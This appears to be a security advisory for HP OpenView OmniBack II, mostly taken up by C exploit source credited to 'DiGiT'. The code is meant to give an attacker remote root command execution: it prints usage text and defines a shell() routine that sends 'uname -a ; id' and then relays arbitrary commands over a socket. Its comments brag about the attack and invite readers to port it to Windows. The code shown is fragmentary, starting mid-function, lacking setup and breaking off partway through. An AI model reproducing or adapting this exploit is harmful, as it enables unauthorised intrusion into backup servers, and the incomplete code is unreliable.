HP OpenView OmniBack II provides the most reliable, high-performance data protection for heterogeneous and Windows-based computing environments. A security vulnerability in the product allows attackers to cause the program to execute arbitrary code, allowing compromising of the operating system.
Credit:
The information has been provided by DiGiT.
The exploit below can be used to test for this vulnerability.
Exploit:
/ *
* HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is
*
* Omniback is a network backup system by HP, widely used.
* took me some time to figure out how omniback communicated then it was just
* a matter of finding a bug.
*
* This lovely little exploit will give you a remote "shell" of sorts, you
* can execute any command on the system.
*
* As far as I can tell this thing is vuln on every Omniback I have seen.
* I've tried HP-UX, Linux so far, with diff versions etc. It needs some change
* to work on windows, but should very extremly easy, be creative.
*
* Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>
*
* - DiGiT [digit@security.is]
*
* I'm releasing this because it leaked and kids got their hands on it ;<
* sorry.
*/
printf ("\nOmniback II *: remote exploit by DiGiT - teddi@linux.is\n");
printf ("Gives possibility to execute any command on a remote system as root!\n\n");
printf ("Usage: %s hostname \n\n", progname);
exit (1);
}
int
shell()
{
fd_set fd_stat;
char recv[1024];
int n,i;
static char testcmd[256] = "/bin/uname -a ; id ;\r\n";
fprintf(stdout, "We have remote shell&%#$&%!\n");
fprintf(stdout, "\nType in any command and it will get executed.\nHave fun... DiGiT - teddi@linux.is\n\n\n");
write(sockfd, testcmd, strlen(testcmd));
